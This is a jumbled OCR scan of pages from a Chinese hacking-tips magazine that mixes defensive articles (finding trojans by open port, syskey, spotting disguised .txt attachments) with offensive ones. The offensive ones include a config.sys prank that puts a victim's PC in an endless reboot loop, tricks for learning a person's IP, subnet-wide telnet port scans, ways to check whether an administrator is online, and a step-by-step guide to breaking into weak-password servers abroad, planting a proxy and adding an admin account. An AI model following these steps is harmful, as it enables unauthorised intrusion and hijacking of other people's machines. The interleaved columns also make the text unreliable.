令看一下自己的机器开放的端口。进入到命令行
下,使用netstat命令的a和n两个参数:
C:\>netstat -an
Active Connections
Active Connections是指当前本机活动连接,
Proto是指连接使用的协议名称,Local Address是
以必须设置"文件夹选项→查看”中属性为"显示
所有文件和文件夹”才可以看到),然后右键单击
该文件,在弹出菜单中选择"用记事本打开”,接
下来在config.sys文件中加入一行:
device=c:\null.sys /d:null
保存修改结果,退出记事本。以后,你的电脑
就会在出现Windows的启动画面时自动重新启动,
如此反复下去,别人一定以为你的电脑出了问题,
而你就可以偷偷乐了。
Proto Local Address ForeignAddress State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7626 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 0.0.0.0:0
UDP 0.0.0.0:1046 0.0.0.0:0
UDP 0.0.0.0:1047 0.0.0.0:0
8
本地计算机的IP 地址和连接正在使用的端口号,
Foreign Address是连接该端口的远程计算机的IP
地址和端口号,State则是表明TCP 连接的状态,你
可以看到后面三行的监听端口是UDP协议的,所以
没有State 表示的状态。从上面可以看到机器的
7626 端口已经开放,正在监听等待连接,这表示
机器很可能已经感染了冰河。
二、工作在Windows 2000 下的Fport
Fport是FoundStone出品的网络安全工具。它可
以用来列出系统中所有打开的TCP/IP和UDP端口,
以及对应的应用程序的完整路径、PID标识、进程名
称等信息。该软件在cmd命令框下使用,请看例子:
D:\>fport.exe
FPort v1.33 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com ;
这样各个端口究竟是什么程序打开的就一目
了然了。如果发现有某个可疑程序打开了某个可
疑端口,那就很可能是木马。
Fport 的最新版本是2.0。很多网站都提供下
载,但是为了安全起见,最好还是到FoundStone的
官方网站去下载。(http://www.foundstone.com/
knowledge/zips/fport.zip)
三、与Fport 功能类似的形化界面
工具Active Ports
Active Ports为SmartLine出品的用来监视电脑
所有打开的TCP/IP/UDP端口的工具。它不但可以
将你所有的端口显示出来,还显示所有端口所对
应的程序所在的路径,本地IP和远端IP(试连接
你的电脑IP)是否正在活动。除此之外,它还提供
了一个关闭端口的功能,当你用它发现被木马开
放的端口时,可以立即将端口关闭。这个软件在
Windows NT/2000/XP 平台下工作,你可以从
http://www.smartline.ru/software/aports.zip下载。
其实使用Windows XP的用户无须借助其它软
件即可以得到端口与进程的对应关系,因为Windows
XP所带的netstat命令比以前的版本多了一个
"o”参数,使用这个参数就可以检测到与打开端口
对应的进程。
上面介绍了几种查看本机开放端口以及与端
口相对应的进程的方法,通过这些方法可以轻松
地发现基于TCP/UDP 协议的木马。但是如果碰上
反弹端口木马,或者利用驱动程序及动态链接库
技术制作的新木马时,以上这些方法就很难查出
木马的痕迹了。所以我们一定要养成良好的上网
习惯,不要随意运行邮件中的附件,从网上下载的
软件先用杀毒软件检查一遍再使用,在上网时要
打开网络防火墙和病毒实时监控,以保护自己的
机器不被木马或病毒入侵。
作为一个黑客,在攻击前收集对方机器信息
是很重要的。因此如何得到对方主机的IP地址是一
个重要问题,下面就介绍几种简单的查看目标机IP
地址的方法。
一、通过QQ 软件查IP 补丁查IP
每当QQ 的一种新版本出来,隔不了几天补丁
程序就出来了,即便是菜鸟查看IP地址和端口都异
常容易,如QQ2005 珊瑚虫版就在腾讯公司提供
轻松查看IP 地址
Pid Process Port Proto Path
748 tcpsvcs 7 TCP C:\WINNT\System32\tcpsvcs.exe
748 tcpsvcs 9 TCP C:\WINNT\System32 \tcpsvcs.exe
748 tcpsvcs 19 TCP C:\WINNT\System32 \tcpsvcs.exe
416 svchost 135 TCP C:\WINNT\system32 \svchost.exe
9
黑客基本技巧
1
2
3
QQ2005 下载之后很短时间内就出来了,这种版本
便是在QQ原有版本的基础上,增加了显示好友的
IP 地址以及地理位置的补丁,只要对方在线就可
以轻松查看对方的IP地址、所在地等信息(1)。
二、用防火墙查看IP
由于QQ 使用的是UDP 协议来传送信息的,而
UDP 是面向无连接的协议,为了保证信息到达对
方,QQ 需要对方发一个认证,告诉本机对方已经
收到消息,一般的防火墙(例如天网)都带有UDP
监听的功能,因此我们就可以利用这个功能来查
看IP。
第一步:运行防火墙程序,在"自定义IP规则”
那一栏把"UDP 数据包监视”选项打上钩(QQ 中
的聊天功能使用的是UDP的4000端口作为数据发
送和接收端口)。接着点一下工具按钮上那个像磁
盘一样的"保存规则”标(2)。
第二步:运行QQ,向想查询IP 地址的QQ 对
象发一信息。
第三步:切换到防火墙程序所在窗口,点击主
界面像铅笔一样的按钮进入日志界面,看看当前
由防火墙记录下来的日志(3)。
在日志中,如果对方端口是OICQ Server[8000],
则表示该条日志上的IP地址是QQ服务器的。排除
了本机的IP地址、发送到网关的IP地址以及QQ服
务器的IP地址后,剩下的就是对方的IP地址了,如
中为210.82.117.92。拥有了对方的IP地址,如
果还想知道对方的地理位置,可以再配合"追捕”
之类的工具软件,便可了解对方大概在哪里了。用
这种方法来查找IP 地址,不会受QQ 版本的限制,
是一劳永逸的事。
注意:利用天网的日志功能也可以查到那些
成天抱着一个扫描器到处扫描的人的IP地址。这
是黑客需要具备的很重要的技能,在攻击别人时,
首先要懂得保护自己,时时警惕身边可能存在的
黑客,以免弄得"出师未捷身先死”,那就得不偿
失了。
三、聊天室中查IP
在允许贴、放音乐的聊天室,利用HTML 语
10
4
5
如果对方在浏览器中将像、声
音全部禁止了,此方法就无能为力。
对于使用代理服务器的,此方法也只
能查到他所用代理的IP地址,无法查
到其真实IP地址。
提示
对于个人计算机或是其它机器我
们还可以使用ping 命令查看对方是
否在线,只有对方在线,我们才能再
进行下一步攻击。
提示
言向对方发送片和音乐,如果把片或音乐文
件的路径设定到自己的IP上来,那么尽管这个URL
地址上的片或音乐文件并不存在,但你只要向
对方发送过去,对方的浏览器将自动来访问你的
IP。对于不同的聊天室可能会使用不同的格式,但
你只需将路径设定到你的IP上就行了。
如:"XXX 聊天室”发送格式如下:
发像:img src="http:// 61.128.187.67/
love.jpg"
发音乐:img bgsound="http:// 61.128.187.
67/love.mid"
这两个语句里的61.128.187.67需要替换成你
自己的IP地址。这样你用监视软件就可以看到连接
到你机器的IP地址,这种软件很多,如lockdown,
IP Hunter等。
四、查网站的IP 地址
如果想要攻击某个网站的话,也需要首先获
得该网站的IP地址,获取网站地址最简单的办法还
是使用Windows自带的一个小程序ping.exe。
在cmd 命令框下输入"pingwww.xxx.com”。
运行之后会显示该网站的IP地址以及其他一些信
息(4)。
如果ping通了,将会从该IP地址返回byte,time
和TTL的值,这样我们就有了进一步进攻的条件。
其中time时间越短,表示响应时间越快。
随着QQ 版本的升级,QQ 安全性
也越来越高,用户可以自己设定是通
过点对点模式还是服务器模式传送消
息,如果对方选择了服务器模式,你
也就得不到他的IP地址了。
提示
11
黑客基本技巧
随着网络黑客工具的简单化和傻瓜化,越来
越多的黑客爱好者可以通过现成的攻击工具轻松
地入侵主机。然而谁也不想在管理员的眼皮底下
入侵电脑,因此在入侵成功之后,一个很重要的事
情是:你能不能确认你的行为是在别人的监视之
下?所以我们首先要知道管理员是不是现在正在
你侵入的主机上。
一、要判定管理员是否在线,首先就要知道管
理员是通过什么方式管理主机的:是pcanywhere、
vnc、DameWar、终端服务、ipc、telnet还是本地登录。
如果是用第三方的控屏工具(pcanywhere、vnc、
DameWar 等),你只要看相应端口有没有状态为
"ESTABLISHED" 的连接。在cmd 命令框里输入
"netstat -an”命令就可以知道。如果想查看与端
口相关的进程,使用"Fport.exe”就可以了。比如
我们在一台主机上使用"netstat -an”发现如下的
信息:
Active Connections
然后使用Fport.exe得到如下的信息:
如何判断管理员是否在线
在Windows 2000 下打开cmd 窗口,然后输入
如下命令:
for /l %a in (1,1,254) do start /min /low
telnet 192.168.0.%a 3389
这条命令可以使192.168.0.x这个IP段所有开
放3389端口的主机都会暴露出来。这条命令执行
后会在任务栏打开254个小窗口,每个窗口对应一
个该IP段的IP地址。如果检测到某IP地址的主机
未开放3389 端口,则对应的窗口将在5 秒钟内退
出,最后剩下的窗口对应的就是开放了端口的主
机了,看一下小窗口的标题可以得知主机的IP地
址。如果你觉得你的机器性能很好的话,还可以
把/low 参数去掉。
如果要扫描一台主机的多个端口,可以输入
如下命令:
for /l %a in (1,1,65535) do start /low /min
telnet 192.168.0.1 %a
这样就扫描到IP地址为192.168.0.1的主机从
1 到65535的所有端口。
输入如下命令扫描一个网段的所有端口:
for /l %a in (1,1,254) do for /l %b in (1,
1,65535) do start /low /min telnet 192.168.0.
%a %b
这样就可以扫描IP段为192.168.0.x的全部主
机从1 到65535的所有端口。
以上命令在Windows 2000 以及Windows XP
下测试可以使用。
扫描一个网段的所有端口
Proto Local Address ForeignAddress State
TCP lin:1755 lin:telnet ESTABLISHED
TCP lin:1756 lin:netbios-ssn ESTABLISHED
TCP lin:1758 202.103.243.105:http TIME_WAIT
TCP lin:1764 202.103.243.105:http TIME_WAIT
TCP lin:6129 lin:1751 ESTABLISHED
Pid Process Port Proto Path
528 mysqld-nt 3306 TCP D:\mysql\bin\mysqld-nt.exe
1328 DWRCS 6129 TCP C:\WINNT\SYSTEM32\DWRCS.EXE
8 System 138 UDP
248 lsass 500 UDP C:\WINNT\system32\lsass.exe
12
其中"1328 DWRCS → 6129 TCP C:
\WINNT\SYSTEM32\DWRCS.EXE”这行代表的是
DameWare Mini Remote Control服务。从这个可以
看出,管理员是通过DameWare Mini Remote Control
来管理现在的主机,连接的端口是6129。同样,
如果管理员使用其他的控屏工具, 比如
pcanywhere、vnc等,我们也可以通过"netstat -an”
查看端口连接的情况。
二、对于从本地或终端服务登录的,由此可以
通过查看winlogon进程进行判断。我们可以使用的
工具是psttools系列工具中的pulist.exe,它能够查
看本机所有正在运行的进程。当然仅凭几个
winlogon进程也很难完全判定在线的是不是管理员,
因为一般用户和管理员都是通过形界面登录的,
身份验证都是在GINA(Graphical Identification and
Authentication,形标识和身份验证)中进行,而
GINA又和winlogon进程紧密相关,所以查看有几个
winlogon进程只能知道当前有几个用户登录主机。
在主机上运行pulist.exe,查看进程情况如下:
上面我们发现有"2 0 8 \ ? ? \ C : \ W I N N T
\system32\winlogon.exe”和"1084 \??\C:
\WINNT\system32\winlogon.exe”这二个
winlogon.exe进程,由此可以知道目前有两个用户
通过本地或终端服务登录主机。再结合上面说的
判定方法,使用"netstat - an”命令查看TCP端
口连接:
由此可以看出管理员使用的是终端3389连接
登录。
三、因为telnet的登录不是通过winlogon来管
理的,所以要判断通过telnet登录的管理员是否在
线还是看相应端口的连接吧。我们知道一般情况
下telnet使用23端口连接,通过"netstat -an”命
令可以很清楚地看出23端口有没有打开:
C:\>netstat -an
Active Connections
我们也可以通过上面的方法查看相应的进程,
比如使用FPORT.EXE 得到如下的信息:
E:\HACK>fport
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
从上面信息中"1112 tlntsvr 23 TCP C:\WINNT
\system32\tlntsvr.exe”这行可以知道23端口对应
的正是telnet服务tlntsvr.exe。
四、如果管理员是通过IPC$ 管道进行登录管
理,我们可以用Windows NT 系统内置的工具NET
SESSION 来判断其是否在线。NET SESSION的作用
是列出或断开连接本地计算机和与它连接的客户
之间的会话。使用后结果如下:
PID Path
0 [IdleProcess]
8 [System]
160 \SystemRoot\System32\smss.exe
184 \??\C:\WINNT\system32\csrss.exe
208 \??\C:\WINNT\system32\winlogon.exe
680 C:\WINNT\System32\svchost.exe
404 C:\WINNT\Explorer.EXE
1088 \??\C:\WINNT\system32\csrss.exe
1084 \??\C:\WINNT\system32\winlogon.exe
Num LocalIP Port RemoteIP PORT Status
10 192.168.0.1 3389 192.168.2.1 1071 Established
Proto Local Address Foreign Address State
TCP 127.0.0.1:23 127.0.0.1:1030 ESTABLISHED
TCP 127.0.0.1:1030 127.0.0.1:23 ESTABLISHED
Pid Process Port Proto Path
660 inetinfo 21 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
1112 tlntsvr 23 TCP C:\WINNT\system32\tlntsvr.exe
660 inetinfo 80 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
416 svchost 135 TCP C:\WINNT\system32\svchost.exe
660 inetinfo 443 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
8 System 1028 TCP
408 telnet 1030 TCP C:\WINNT\system32\telnet.exe
13
黑客基本技巧
E:\HACK>net session
命令成功完成。从上面我们可以看出当前有
一个用户名为LIYUN的用户登录了主机LIN。
下面再给大家推荐一个比较好的工具——
PSTOOLS工具系列里面的psloggedon.exe,它不仅
能列出使用IPC$登录的用户,而且能列出本地登
录的用户。运行效果如下:
E:\Pstools\Pstools>psloggedon.exe
PsLoggedOn v1.21 - Logon Session Displayer
Copyright (C) 1做广告请找站长商谈-2000 Mark Russinovich
Users logged on locally:
肉鸡是指打开了3 3 8 9 端口微软终端服务
(microsoft terminal service),又存在弱密码的高速
服务器的俗称。我们要用肉鸡做跳板,是出于安全
考虑,因为这样可以更好地隐藏自己的踪迹。我们
可以用各种远程管理工具登录上肉鸡,然后像操
作自己电脑上一样控制远程的服务器(也就是肉
鸡)做我们想做的事情。
基本的工具:
1. X-scan v1.3
强大的漏洞扫描工具,对于初学者来说是非
常好的一个工具。我们主要用它来扫描一些基本
的漏洞(主要是Windows NT 中的弱密码)。
2. Superscan
非常快速的端口扫描工具,可以在很短的时间
里发现某个IP域上IP的分布。使用它的原因主要是
为了避免盲目扫描,以便提高扫描效率。比如说,
某个IP域上IP地址的分布不是连续的,有可能从
xxx.xxx.0.0-xxx.xxx.50.255每个IP地址上都有计
算机存在,而从xxx.xxx.51.0- xxx.xxx.100.255
每个IP都没有计算机存在。如果你不通过Superscan
扫描事先了解这个情况的话,就会白白花很长时间
去扫描根本不存在的主机,浪费金钱和精力。
3. fluxay
大名鼎鼎的扫描工具,我们主要用它的NT 管
道命令功能来实现连接目标主机、添加用户以及
启动远程服务等功能。
注意:最好使用4.0版本fluxay。
4. 基于Windows2000或更高版本的cmd提示
符工具
也就是说,跳板的制作至少是要在Windows
2000以上的操作系统下进行。
5. sksockserver.exe
做跳板的主角,我们就是用它来实现远程主
机的Socks5代理功能。
肉鸡DIY 全攻略
2004-*-* 14:33:38 LIN\Administrator --
---这个是本地登录的用户administrator
Users logged on via resource shares:
2004-*-* 14:41:04 LIN\LINYUN ----
-这个是使用IPC$连接的用户LINYUN
当然,如何判定管理员是否在线是一个比较
深入的话题,上面说的仅仅是提供一个思路。如果
说管理员登录后却锁定了主机,或者正在运行屏
幕保护程序,这就不太好判断了。有矛必有盾,我
们既然能通过各种方式判定管理员是不是在线,
管理员也能通过这样的途径知道自己是否被入侵,
从而尽快地查出入侵者。所以请广大的黑客爱好
者不要以身试法,入侵国内主机。
计算机用户名客户类型打开空闲时间
LINYUN Windows 20002195 000:08:47
14
6. 全球IP地址分配表
这个工具对于高手来说是不必要的。但是我
们主要的目标是国外的主机,而很多以前没有做
过跳板的初学者网友对国外主机IP的分布不是很
了解,因此可以通过全球IP地址分配表来了解IP分
布情况。并以此作为我们选定所要扫描的IP域的主
要根据,这样就节省了用"追捕”软件查找IP的实
际所在地的时间了。
入侵思路:
1. 先在自己的机器上打开全球IP地址分配表,
选取一个IP区域。
2.用Superscan扫描选定的IP区域,找到其中
一个IP很集中的区域,然后放到x-scan进行漏洞
扫描(因为是面对以前没有做过跳板的网友,所以
这里只介绍用NT弱密码制作跳板),找到若干个有
弱密码的IP。
3.通过弱密码登录肉鸡,把sksockserver.exe上
传到目标主机上,然后远程启动sksockserver。这
样,跳板就做好了。
具体步骤:
1. 首先,我们选择某段IP,比如:x.85.0.0~
x.85.50.255,将扫描起始IP与结束IP放在Superscan
搜索框里面去,再把Superscan的扫描端口设置为
80,点击"确定”后开始扫描。这时,在下面的列
表框里面,会出现一大批的活跃IP。比如x.85.0.
0~x.85.40.255。
2. 随便选一段不太长的IP段,如x.85.0.0~
x.85.5.255。因为我们马上要用X-scan对它们进
行扫描,而X-scan扫描速度并不是很快,如果IP
段过长或IP地址过多的话,会降低扫描效率,并有
可能使X-scan出现误报。
3. 选择好后IP段后就可以用X-scan扫描了。
在"设置”菜单里,先选"扫描模块”,选择"开
放端口”和"NT 弱密码”两个选项,在"扫描参
数”里,填上我们刚才选定的IP范围:x.85.0.0~
x.85.5.255,接着将"端口相关设置”里的其他端
口去掉,只留下80,3389 两个端口,其他设置默
认。然后就开始搜索,这大概需要花8~9 分钟的
时间(因为X-scan虽然简单,但是速度慢),搜索
完成后看看搜索结果,你会惊喜地发现许多机器
存在弱密码,可以用来作肉鸡。但是需要注意的
是,X-scan 会有一些误报,大家一定要有耐心去
试啊。
4. 我们选择一个主机为弱密码的IP地址,比
如:x.x.0.14。接下来就是用流光验证它到底接不
接受远程连接,密码正不正确。打开流光,选择"工
具→NT管道远程命令”,出现对话框,把刚才的IP、
用户名和密码都填进去,然后按回车键。在界面上
"NTCMD”提示符后面输入"CMD”,再次按回车键
后屏幕上出现了"C:\WINNT\SYSTEM32”的提示
符。这表明刚才的用户名和密码是正确的,这台机
器已经基本是你的了。
5 . 进去之后就可以做跳板了。要把
sksockserver.exe放到肉鸡上,这样才能启动远程服
务,让这台肉鸡成为跳板。打开肉鸡上的cmd命令
框,在命令提示符下输入如下命令:
C:\> net use password/
user:username
其中"username”和"password”分别是你探
测出来的用户名和密码。当系统提示"命令成功完
成”后,就说明IPC$ 远程连接成功建立了。然后
输入以下命令:
C:\>copy csksockserver.exe .
14\admin$
成功后系统会提示:"成功复制一个文件”。这
样我们就成功地把sksockserver.exe传到了目标主机上。
6. 接下来的任务就是让它远程启动了。再次
打开流光,在"NTCMD”里键入"CMD”,之后在
提示符下输入如下命令:
csksockserver –install
(系统提示:snake sockproxy service installed)
csksockserver –config port 1949
(端口可由自己决定,这里的1949 是随便选
15
黑客基本技巧
的,输入完按回车键后系统提示:the port value
have set to 1949 )
csksockserver –config starttype 2
(系统提示:the starttype have set to 2---auto
cnetstartskserver)
这个时候远程登录服务已经成功启动,这台
机器已经成为你的跳板了。
当然,并不是找到肉鸡后就万事大吉了。为了
更好地利用找到的肉鸡,我们还有很多工作要做,
比如清理我们的入侵痕迹、创建一个自己的admin
权限用户名以及增加形化远程登录功能等。下
面简单介绍一下这些后续工作。
做后续工作除了要使用到前面介绍的工具之
外,还要用到其它三个工具:
1.Sockscap:强大的socks代理调度软件。
2.sksockserver GUI:snake的代理跳板GUI(
形界面程序)。
3.mstsc:微软terminal service(终端服务)的
客户端程序。用于登录3389 肉鸡。有了它,我们
就可以象控制自己的机器一样控制终端服务器,
做我们想做的事情了。
开了3389 服务后,如果要把这台肉鸡当成自
己的机器来使用,就肯定要有自己的登录名。否则
每次总是用别人的,那还怎么叫是自己的机器?
我们现在来给自己添加一个用户名,并把自己提
升成为root权限,这样我们就可以在肉鸡上做任何
事情了。打开流光,选择"工具→ NT 管道命令”,
填上刚才得到的用户名跟密码,点击"确定”后进
入NTCMD 界面,在提示符下键入"CMD”,连接成
功以后在系统提示符下进行如下操作:
C:\> net user admin add(添加一个用户名为
admin的用户。)
C:\> net user admin shonline788(使得admin
的密码是shonline788。)
C:\> net localgroup administrators admin add
(把用户admin提升为administrator即管理员身份)
这样我们就成功地在这台机器中取得了root权
限,可以作任何事情了。
下一步就要用上我们刚才准备的这些工具了。
其中前面两个工具Sockscap和sksockserver GUI是附
属的工具,它们用来配合实现跳板的使用,可以隐
藏我们的入侵痕迹。在网上找几个Socks 代理,把
Sockscap和sksockserver GUI设置好,再把mstsc的
标拖到Sockscap里去。之后双击mstsc的标,在
其中填上刚才找到的肉鸡的IP地址:x.x.0.14,按
回车键进行连接。成功以后,会出现一个跟Windows
2000一样的蓝色登录界面,在里面填上我们
刚才添加的用户名与密码,敲回车键登录。登录成
功以后就会出现该主机的形界面,这个时候你就
可以象操作自己的机器一样,操作这台肉鸡了。
在Windows XP 和Windows 2000 系统中有一
个大家不常用,但是功能强大的命令——syskey命
令。这个命令可以有效地增强你的系统安全性。也
许你要说进入Windows XP 或Windows 2000 的时
候需要输入账户和密码,这样已经够安全了。但其
实只要你的电脑是多人使用,其他人完全可以通过
各种方法来进入系统,利用种种漏洞来获取管理员
权限。而有了用syskey制作的加密软盘,你就可以
完全放心使用Windows 2000 和Windows XP 了。
下面我们来看看syskey命令的用法。
一、双重密码保护的设置
1.在开始菜单的"运行"中输入"syskey",点
击确定。
Windows XP 超强syskey 命令
16
3
2
1
2.这个界面所提到的账户数据库便是NTFS加
密的原理所在,对于一般用户,不需要了解原理,
只要会用就行。下一步点击" 更新"。
3.这里我们选择密码启动,输入一个密码,然
后点击确定。这样做将使Windows在启动时需要多
输入一次密码,起到了2次加密的作用。操作系统
启动时在往常我们输入用户名和密码之前会出现窗
口提示"本台计算机需要密码才能启动,请输入启
动密码"。这便是我们刚刚创造的双重密码保护。
二、密码软盘的制作
1.如果我们选择" 在软盘上保存启动密码",
这样将生成一个密码软盘,没有这张软盘,谁也别
想进入你的操作系统。当然,如果你之前设置了
syskey系统启动密码,这里还会需要你再次输入那
个密码,以获得相应的授权,这有点类似我们在更
改QQ 密码的时候,必须知道原来的密码一样。
2.然后系统会提示你在软驱中放入软盘,当密
码软盘生成后会出现提示。
3.然后我们再次启动系统,这时系统会提示你
插入密码软盘,如果你不插入软盘就点击确定,系
统是不会放行的。除此之外,插入的密码软盘还可
以根据不同账户输入不同的密码。同时如果你愿意,
密码软盘中的密匙文件可以复制到其他软盘上。
三、去除密码软盘
假如有一天,你对操作系统的安全性要求不
那么高了,或者你厌烦了每次进入系统都需要插
入软盘,怎么办?选择"在本机上保存启动密码"
就可以了,当然,进行这一步操作你必须要有存有
密匙的软盘,这与制作密码软盘时要求输入授权
密码是一个道理。
17
黑客基本技巧
很多人认为txt文件没有危险,因此在网上遇
到陌生人发来的txt文件时往往麻痹大意。很多黑
客利用这一点,将各种有害文件伪装成txt文件,以
达到不可告人的目的。下面我们就来一一揭开这
些有害文件伪装的外衣。
一、隐藏扩展名的txt 文件
假如你收到这样的邮件附件:"QQ 靓号放送.
txt”,你是不是认为它肯定是纯文本文件?不一
定。它的实际文件名可能是"QQ 靓号放送.txt.
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}”。
其中{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
揪出伪装成txt 的有害文件
是注册表里HTML文件关联的意思。但是储存为文
件名的时候它并不会显现出来,这个文件实际上
等同于QQ靓号放送.txt.html。如果你双击它,以
为会打开记事本,结果它却调用了HTML 来运行,
那就只有天知道它要做什么了,删除文件?格式
化硬盘?都有可能。
识别及防范方法
1.这种txt文件显示的并不是文本文件的标,
而是未定义文件类型的标志,这是区分它与正常
txt文件的最好方法。
2.另一个识别方法是在"按Web页方式”查看
时在"我的电脑”左面会显示出其文件名全称(如
大家都知道IE的收藏夹有个导出功能,IE收藏
夹导出的收藏夹网页都有个共同特点——页面的
标题都是"bookmarks”。正好,百度搜索有一个
"title”语法功能,利用该功能我们可以轻易地搜寻
到互联网上所有的收藏夹网页,看看别人都喜欢
哪些站点。
方法一:直捣黄龙
"title”语法的用法很简单,只需要用"A title:
bookmarks ”为关键字在百度中搜索即可。"A”为
其中一个关键字。比如如果你想搜索"在线听歌”
的网站,那么可以用"歌曲title:bookmarks”进行
搜索。
方法二:顺藤摸瓜
除此之外,我们还可以来招"顺藤摸瓜”,通
过某个不错的站点来获得更多同类的优秀站点。
比如,有个叫"小木虫”的网站(http://www.
用百度偷窥别人收藏夹
emuch.net),笔者觉得它还不错,所以想看看收藏
这个站点的人还收藏了些什么好站。只需要在百
度中用"小木虫title:bookmarks”为关键字进行搜
索即可。需要注意的是,这里的"小木虫”必须是
网站标题的一部分,比如百度站点的标题就是"百
度——全球最大中文搜索引擎”,那么我们就可以
用"中文搜索引擎title:bookmarks”来搜索那些收
藏了百度的人还收藏了什么网站。
18
。这里再次提醒你,注意你收到的邮件中附
件的文件名,不仅要看显示出来的扩展名,还要注
意其实际显示的标是什么。
3.对于附件中看起来像是txt的文件,可以将
它下载后用鼠标右键选择"用记事本打开”,这样
会很安全。
二、恶意碎片文件
另一类可怕的txt文件是一种在Windows中被
称作"碎片对象”(扩展名为shs)的文件,它一般被
伪装成文本文件通过电子邮件附件来传播,比方
说形如:QQ号码放送.txt.shs的文件。由于真正的
后缀名shs不会显示出来,如果在文件中含有诸如
"format”之类的命令将非常可怕。另外,它具有很
强的隐蔽性,这是因为:
1.碎片对象文件的默认标是一个和记事本文
件相类似的标,很容易被误认为是一些文本的
文档,用户对它的警惕心理不足。
2.在Windows 的默认状态下,"碎片对象”文
件的扩展名是隐藏的,即使你在"资源管理器”→
"工具”→"文件夹选项”→"查看”中,把"隐
藏已知文件类型的扩展名”前面的"√”去掉,shs
也还是隐藏的,这是因为Windows 支持双重扩展
名,如"QQ号码放送.txt.shs”显示出来的名称永
远是"QQ 号码放送.txt”。
3.你用任何杀毒软件都不会找到这个文件的
一点问题,因为这个文件本身就没有病毒,也不
是可执行的,而且还是系统文件。你会怀疑这样
的文件吗?
防范方法
在注册表编辑器的"HKEY_CLASSES_ROOT
\ShellScrap”分支下,有一个名称为"NeverShowExt”
的键,它是导致shs文件扩展名无法显示的罪魁祸
首。删除这个键值,你就可以看到shs文件扩展名了。
另外,还可以更换"碎片对象”文件的默认
标。打开"资源管理器”→"查看”→"文件夹选
框”→"文件类型”→"已注册的文件类型”→"碎
片对象”,单击"编辑”,在"编辑文件类型”对话
框中单击"更改标”按钮。打开C:/WINDOWS/
SYSTEM/Pifmgr.dll,选择一个新标即可。
三、改头换面的Outlook 附件
除了上面所说的两类危险的txt文件外,还有
一种改头换面的Outlook邮件附件。它看似txt文
件,其实是exe文件。
当你用Outlook 2000收到邮件时,它可能会显
示这是一个带附件的邮件,双击打开时,Outlook
会提示:部分对象携带病毒,可能对你的计算机造
成危害,因此,请确保该对象来源可靠。这说明该
附件有问题。
识别方法
尽管这种文件的迷惑性极大,但是仍然会露
出一些马脚:
1.它其实是一个OLE对象,并不是附件,它的
选择框不同于附件的选择框。点击鼠标右键出现
的菜单与正常附件的菜单不同。
2.双击打开它时,安全提示与附件的安全提示
不同,这点非常重要。这时,应该选择"NO”,然
后点击鼠标右键,选择"编辑包”。当提示"是否
信任该对象”时,选择"YES”。这时在对象包装程
序的右边内容框中,将现出该文件的原形。
3.因为它不是附件,在选择"文件”→"保存
附件”时并无对话框出现。
4.由于并不是所有的邮件收发软件都支持对象
嵌入,所以这类邮件的格式不一定被某些软件识
别。但是Outlook的使用面很广,尤其是在比较大
19
黑客基本技巧
网络电话(视频电话、宽带电话或视频宽带电
话)又叫VoIP,即Voice over Internet Protocol的缩
写,是基于IP网络的语音传输技术。网上有许多的
网络电话软件,通过这些网络电话软件,可以免费
打电话。下面推荐一款网络电话软件TelTel。
进入软件官方网站http://www.teltel.com/,
单击页面右上方的"简体中文”超链接,就可进入
TelTel的简体中文页面(1)。单击"立即下载(完
全免费)”按钮,进入TelTel下载页面。单击"大陆
网站下载”超链接即可开始下载TelTel网络电话。将
TelTel下载并安装完成后,就可以使用TelTel了。
单击"登录”按钮,出现"登录”对话框,如
果你以前使用过TelTel并注册了用户,可在此直接
输入已注册用户的电子邮件和密码。如果是新用
免费拨打任意电话
户,则单击
"注册”按钮
进行注册,
在出现的
"建立账户”
对话框中输
入你的电子
邮件地址
(2)。然后
单击"下一
步”按钮,出
现"设定个
人信息”对
话框,在此
1
我们知道对文件加密有许多种方式,例如用第
三方加密软件。其实用系统漏洞也能加密文件。
Windows系统下不能够以一些字样来命名文件
或文件夹,包括:"aux”、"com1”、"com2”、"prn”、
"con”和"nul”等,因为这些名字都属于设
备名称,等价于一个DOS 设备,如果我们把
文件或文件夹命名为这些名字,Windows 就会误
以为发生重名,提示"不能创建同名的文件”。我
们可以利用这漏洞来加密文件。
假如要把C盘的1.txt加密。可以选择桌面右
用漏洞加密文件
下角的"开始”-"运行”,在运行框里输入"cmd”
后点击"确定”,打开cmd 命令框。输入"copy c:
\1.txt ”(或者其它几个名字都可
以)。这样,在C盘下就生成了一个名字为aux.txt
的文本文档。但是这个文档在Windows 界面下是
打不开的,因此起到了加密的作用。
要打开文件也很简单,在cmd 命令框里输入
"\\.\c:\aux.txt”即可。要删除文件则输入"del
”。
的、有自己Mail服务器的公司,所以还是有必要提
醒大家小心嵌入对象。不光是Outlook,Word、Excel
等支持嵌入对象的软件也可以让嵌入对象改头换
面迷惑人。
上面介绍了三种伪装成txt文件的有害软件。
其实只要我们在上网时足够小心,按本文所说的
防范方法去做,就不会有危险了。
20
输入密码及显示的姓名。单击"下一步”按钮,出
现"开始”对话框,提示用户注册成功,TelTel已
经寄出封电子邮件到你的注册邮箱中。单击"完
成”按钮,登录到你的注册邮箱中,打开TelTel寄
给你的邮件,根据提示单击链接来激活账户,然后
就可使用TelTel软件了。
TelTel对拨打固定电话、小灵通及手机的用户
做了一定的限制,你的TelTel中必须有3个或3个
以上的好友才可拨打电话,并且添加的好友越多,
则越有机会打通电话。因此,用户在使用